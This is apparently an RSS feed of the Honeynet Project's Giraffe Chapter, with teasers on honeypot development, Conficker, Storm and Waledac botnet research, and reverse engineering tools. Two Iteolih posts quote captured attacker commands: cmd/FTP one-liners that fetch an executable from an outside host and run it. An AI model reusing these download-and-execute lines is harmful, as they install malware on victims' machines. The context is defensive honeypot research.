<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://honeynet.org" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
 <title>Giraffe Chapter</title>
 <link>http://honeynet.org/chapters/giraffe</link>
 <description>We are development orientend honeynet chapter. Our main research interests are: low interaction honeypots, emulation, reverse engineering.</description>
 <language>en</language>
<item>
 <title>HoneyMap - Visualizing Worldwide Attacks in Real-Time</title>
 <link>http://honeynet.org/node/960</link>
 <description>&lt;p&gt;&lt;a href=&quot;/node/960&quot;&gt;&lt;img src=&quot;http://www.honeynet.org/files/images/honeymap.preview.png&quot; width=&quot;640&quot; height=&quot;358&quot; alt=&quot;HoneyMap Screenshot&quot; /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The HoneyMap shows a real-time visualization of attacks against the Honeynet Project&#039;s sensors deployed around the world. It leverages the internal data sharing protocol &lt;a href=&quot;https://github.com/rep/hpfeeds&quot;&gt;hpfeeds&lt;/a&gt; as its data source. Read this post to learn about the technical details and frequently asked questions. Before going into explanations, take a look at the map itself: &lt;a href=&quot;http://map.honeynet.org/&quot;&gt;map.honeynet.org&lt;/a&gt;!&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/960&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/275">honeymap</category>
 <category domain="http://honeynet.org/taxonomy/term/59">honeypot</category>
 <category domain="http://honeynet.org/taxonomy/term/25">visualization</category>
 <category domain="http://honeynet.org/taxonomy/term/276">worldmap</category>
 <pubDate>Mon, 01 Oct 2012 09:51:45 -0500</pubDate>
 <dc:creator>mark.schloesser</dc:creator>
 <guid isPermaLink="false">960 at http://honeynet.org</guid>
</item>
<item>
 <title>Giraffe Chapter - Status Report 2009/2010</title>
 <link>http://honeynet.org/node/707</link>
 <description>&lt;p&gt;The Giraffe Chapter&#039;s continuous goal is to develop and improve honeypot technology and related tools and to conduct in-depth analysis of new attack techniques and malware specimens. This report lists our main activities and contributions from the last two and a half years.&lt;/p&gt;
&lt;p&gt;_________________________________________________________________________________&lt;br /&gt;
&lt;strong&gt;ORGANIZATION&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Much to our regret, two of the founding members of our chapter have decided to terminate their Honeynet Project membership and are thus officially moved to alumni status. We respect this step and are grateful for an adventurous journey and their numerous contributions over the years. We will continue to work closely together with our friends, and want them to know that they can rejoin the team whenever they wish to.&lt;/p&gt;
&lt;p&gt;The Giraffe Chapter consists of the following people:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Felix Leder&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Mark Schlösser&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Tillmann Werner&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Georg Wicherski&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/707&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <pubDate>Fri, 01 Jul 2011 07:40:23 -0500</pubDate>
 <dc:creator>tillmann.werner</dc:creator>
 <guid isPermaLink="false">707 at http://honeynet.org</guid>
</item>
<item>
 <title>A Breeze of Storm</title>
 <link>http://honeynet.org/node/539</link>
 <description>&lt;p&gt;Today, Steven Adair from Shadowserver imformed us about a new piece of malware that looks like a new version of the infamous Storm Worm. Storm was one of the first serious peer-to-peer botnets, it was sending out spam for more than two years until its decline in late 2008. Mark Schloesser, Tillmann Werner, Georg Wicherski, and I &lt;a&gt;did some work on how to take down Storm&lt;/a&gt; back then, so the rumors about a new version caught our interest.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/539&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/126">Storm Worm</category>
 <category domain="http://honeynet.org/taxonomy/term/127">Stormfucker</category>
 <pubDate>Tue, 27 Apr 2010 19:05:23 -0500</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">539 at http://honeynet.org</guid>
</item>
<item>
 <title>Dissecting the SotM Attack Trace Pcap</title>
 <link>http://honeynet.org/node/521</link>
 <description>&lt;p&gt;Hi everybody,&lt;/p&gt;
&lt;p&gt;our first &lt;a href=&quot;https://honeynet.org/node/504&quot;&gt;Scan of the Month Challenge&lt;/a&gt; in 2010 is over! We received 91 submissions in total, and some parts of the solutions are so interesting that I would like to publicly highlight them in this post. Now that the winners are announced (Congratulations Ivan, Franck, and Tareq!), I think I also owe you an explanation why we asked the specific questions and what we expected as answers. I am sure you will be surprised how many pieces of information you can dig up in a plain pcap - I was indeed when I had a look at the solutions we received. Enjoy!&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/521&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/121">Forensic Challenge 2010</category>
 <pubDate>Fri, 19 Feb 2010 08:13:35 -0600</pubDate>
 <dc:creator>tillmann.werner</dc:creator>
 <guid isPermaLink="false">521 at http://honeynet.org</guid>
</item>
<item>
 <title>RE-Google in action - screenshot</title>
 <link>http://honeynet.org/node/496</link>
 <description>&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <pubDate>Sun, 15 Nov 2009 16:49:33 -0600</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">496 at http://honeynet.org</guid>
</item>
<item>
 <title>RE-Google - or how Grandma started Reverse Engineering</title>
 <link>http://honeynet.org/node/493</link>
 <description>&lt;p&gt;Some people say &quot;Reverse Engineering is an art&quot;. Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the &lt;a href=&quot;http://regoogle.carnivore.it&quot;&gt;RE-Google&lt;/a&gt; plugin for IDA Pro, even your granny can start reversing :)&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/493&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/112">beginner</category>
 <category domain="http://honeynet.org/taxonomy/term/30">google</category>
 <category domain="http://honeynet.org/taxonomy/term/110">re-google</category>
 <category domain="http://honeynet.org/taxonomy/term/108">reverse engineering</category>
 <category domain="http://honeynet.org/taxonomy/term/109">reversing</category>
 <pubDate>Sun, 15 Nov 2009 16:20:07 -0600</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">493 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: RPC vulnerability implementation party</title>
 <link>http://honeynet.org/node/488</link>
 <description>&lt;p&gt;The &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://dionaea.carnivore.it/&quot;&gt;Dionaea&lt;/a&gt; honeypot got more and more mature during the last weeks. As Markus blogged in &lt;a title=&quot;Markus&amp;#039; blog&quot; href=&quot;https://www.honeynet.org/node/485&quot;&gt;Iteolih: Miles and More&lt;/a&gt; the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.&lt;/p&gt;
&lt;p&gt;The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/488&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/107">Iteolih Samba DCERPC Python libemu</category>
 <pubDate>Tue, 25 Aug 2009 11:33:00 -0500</pubDate>
 <dc:creator>mark.schloesser</dc:creator>
 <guid isPermaLink="false">488 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Miles and More</title>
 <link>http://honeynet.org/node/485</link>
 <description>&lt;p&gt;We got a new milestone due:&lt;br /&gt;
&lt;strong&gt;10.08.2009&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;thread-pool works&lt;/li&gt;
&lt;li&gt;stream recording works&lt;/li&gt;
&lt;li&gt;shellcode detection using libemu works&lt;/li&gt;
&lt;li&gt;shellcode emulation using libemu works&lt;/li&gt;
&lt;li&gt;compiles on linux&amp;amp;openbsd&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An exploit taken from a public repository, run against the software, is detected and emulated.&lt;br /&gt;
To shorten things, basically all required points are hit with current svn.&lt;br /&gt;
So, given the time we just saved, some words about how it works.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/485&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Tue, 11 Aug 2009 07:10:33 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">485 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: malicious ftp services</title>
 <link>http://honeynet.org/node/470</link>
 <description>&lt;p&gt;Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WinExec(&quot;cmd /c echo open 78.1.96.200 4871 &amp;gt; o&amp;amp;echo user 1 1 &amp;gt;&amp;gt; o &amp;amp;echo get msq16.exe &amp;gt;&amp;gt; o&quot;)&lt;br /&gt;
ExitThread(0)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/470&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Sun, 26 Jul 2009 08:28:13 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">470 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: If you can&#039;t touch it ...</title>
 <link>http://honeynet.org/node/466</link>
 <description>&lt;p&gt;While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.&lt;/p&gt;
&lt;div class=&quot;geshifilter&quot;&gt;
&lt;div class=&quot;text geshifilter-text&quot; style=&quot;font-family:monospace;&quot;&gt;cmd /c echo open v1.usbupdatestrings.at 4356 &amp;gt; i&amp;amp;echo user ik ik &amp;gt;&amp;gt; i &amp;amp;echo binary &amp;gt;&amp;gt; i &amp;amp;echo get Ms07.exe &amp;gt;&amp;gt; i &amp;amp;echo quit &amp;gt;&amp;gt; i &amp;amp;ftp -n -s:i &amp;amp;Ms07.exe&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/466&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/93">ftp</category>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Tue, 21 Jul 2009 08:17:48 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">466 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: SMB/RPC efforts</title>
 <link>http://honeynet.org/node/463</link>
 <description>&lt;p&gt;During the last weeks I have been working on SMB and specifically DCERPC support for the &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://dionaea.carnivore.it/&quot;&gt;Dionaea&lt;/a&gt; next generation low-interaction honeypot (buzz!).&lt;/p&gt;
&lt;p&gt;SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The &lt;a href=&quot;http://www.snia.org/tech_activities/CIFS/&quot;&gt;CIFS technical reference&lt;/a&gt; and the &lt;a href=&quot;http://ubiqx.org/cifs/&quot;&gt;Implementing CIFS&lt;/a&gt; book have been constant companions for me since the beginning of the project.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/463&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/92">Iteolih Samba DCERPC Python</category>
 <pubDate>Sat, 11 Jul 2009 10:23:49 -0500</pubDate>
 <dc:creator>mark.schloesser</dc:creator>
 <guid isPermaLink="false">463 at http://honeynet.org</guid>
</item>
<item>
 <title>Conficker.A going down?</title>
 <link>http://honeynet.org/node/461</link>
 <description>&lt;p&gt;&lt;a href=&quot;/papers/conficker&quot; target=&quot;_blank&quot;&gt;Conficker&lt;/a&gt; contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind&#039;s GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind&#039;s server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukrain.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/461&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/39">conficker</category>
 <pubDate>Fri, 10 Jul 2009 16:51:17 -0500</pubDate>
 <dc:creator>tillmann.werner</dc:creator>
 <guid isPermaLink="false">461 at http://honeynet.org</guid>
</item>
<item>
 <title>nebula - Client library and revised signature segment selection</title>
 <link>http://honeynet.org/node/440</link>
 <description>&lt;p&gt;&lt;a title=&quot;HPSoc Project Description&quot; href=&quot;/gsoc/project11&quot; target=&quot;_self&quot;&gt; &lt;/a&gt;&lt;img src=&quot;http://nebula.carnivore.it/nebula.png&quot; alt=&quot;nebula Logo&quot; width=&quot;100&quot; height=&quot;76&quot; /&gt;&lt;a title=&quot;HPSoc Project Description&quot; href=&quot;/gsoc/project11&quot; target=&quot;_self&quot;&gt;    One project&lt;/a&gt; mentored by the Honeynet Project during GSoC aims at improving &lt;a title=&quot;nebula - An Intrusion Signature Generator&quot; href=&quot;http://nebula.carnivore.it&quot; target=&quot;_self&quot;&gt;nebula&lt;/a&gt;, an automated intrusion signature generator. There are two critical components in the signature generator: A clustering engine that groups similar attacks into classes, and a signature assembler that extracts common features and selects some of them for the actual signature.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/440&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/gsoc/project11" xmlns="http://drupal.org/project/og">GSoC Project #11 - Automatic generation of IDS signatures from honeynet data (Nebula)</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/44">gsoc</category>
 <category domain="http://honeynet.org/taxonomy/term/68">HPSoC</category>
 <category domain="http://honeynet.org/taxonomy/term/67">nebula</category>
 <pubDate>Mon, 08 Jun 2009 03:58:59 -0500</pubDate>
 <dc:creator>tillmann.werner</dc:creator>
 <guid isPermaLink="false">440 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Is this worth your time?</title>
 <link>http://honeynet.org/node/437</link>
 <description>&lt;p&gt;Hello,&lt;br /&gt;
due to the length of the whole term &lt;em&gt;Improving the effectiveness of low interaction honeypots&lt;/em&gt;&lt;strong&gt;,&lt;/strong&gt; I decided to use &lt;strong&gt;Iteolih&lt;/strong&gt; as uniq abbrevitation. Things are rolling for the project, writing &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://svn.carnivore.it/browser/dionaea/trunk&quot;&gt;code&lt;/a&gt; started, a basic &lt;a href=&quot;http://dionaea.carnivore.it/&quot;&gt;homepage&lt;/a&gt; with instructions how to compile/use it was created.&lt;br /&gt;
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/437&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Fri, 05 Jun 2009 17:37:36 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">437 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Python Benchmark</title>
 <link>http://honeynet.org/node/426</link>
 <description>&lt;p&gt;As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The &#039;testsuite&#039; is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.&lt;br /&gt;
I tested &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)&lt;/li&gt;
&lt;li&gt;3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_&lt;/li&gt;
&lt;li&gt;3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To benchmark, I ran the apache benchmark tool &lt;strong&gt;ab&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/426&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <category domain="http://honeynet.org/taxonomy/term/56">python</category>
 <pubDate>Sun, 24 May 2009 11:57:02 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">426 at http://honeynet.org</guid>
</item>
<item>
 <title>A view on Conficker&#039;s inside</title>
 <link>http://honeynet.org/node/402</link>
 <description>&lt;p&gt;Many people have asked us, how Conficker looks like. That&#039;s a tough question for something that&#039;s hidden and tries to be as stealthy as possible. The last time somebody asked me: &quot;Can you show me Conficker?&quot;, I decided to visualize Conficker. Here is &lt;a title=&quot;Conficker.C video&quot; href=&quot;http://iv.cs.uni-bonn.de/uploads/media/video.avi&quot; target=&quot;_blank&quot;&gt;a little video that shows the evil core of Conficker.C&lt;/a&gt;.&lt;br /&gt;
 &lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/402&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/39">conficker</category>
 <category domain="http://honeynet.org/taxonomy/term/51">control flow</category>
 <category domain="http://honeynet.org/taxonomy/term/52">dependencies</category>
 <category domain="http://honeynet.org/taxonomy/term/50">malware</category>
 <category domain="http://honeynet.org/taxonomy/term/25">visualization</category>
 <pubDate>Fri, 24 Apr 2009 11:47:20 -0500</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">402 at http://honeynet.org</guid>
</item>
<item>
 <title>Speaking Waledac</title>
 <link>http://honeynet.org/node/348</link>
 <description>&lt;p&gt;While it seems to be impossible to say whether waledac is the successor of storm or not, what we &lt;em&gt;can&lt;/em&gt; do is take a look at the traffic encryption. They guys over at Shadowserver have already &lt;a href=&quot;http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231&quot;&gt;blogged some details&lt;/a&gt; about this. We at the &lt;a href=&quot;/chapters/giraffe&quot;&gt;Giraffe Chapter&lt;/a&gt; investigated waledac&#039;s communication protocol further. Here are our results.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/348&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/27">botnet protocols</category>
 <category domain="http://honeynet.org/taxonomy/term/28">encrypted traffic</category>
 <category domain="http://honeynet.org/taxonomy/term/26">encryption</category>
 <category domain="http://honeynet.org/taxonomy/term/21">Waledac</category>
 <pubDate>Tue, 27 Jan 2009 15:33:50 -0600</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">348 at http://honeynet.org</guid>
</item>
<item>
 <title>Giraffe Chapter - Status Report 2008</title>
 <link>http://honeynet.org/node/331</link>
 <description>&lt;p&gt;&lt;strong&gt;ORGANIZATION&lt;/strong&gt;&lt;br /&gt;
This year, Felix Leder and Mark Schlösser joined our team. We are focused on active development of honeypot tools and for us writing code is a passion. The Giraffe Chapter now consists of the following people:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt; &lt;em&gt;Paul Bächer&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Markus Kötter&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Felix Leder&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Mark Schlösser&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Tillmann Werner&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Georg Wicherski&lt;/em&gt;&lt;/li&gt;
&lt;p&gt;&lt;em&gt;&lt;/em&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;DEPLOYMENTS&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
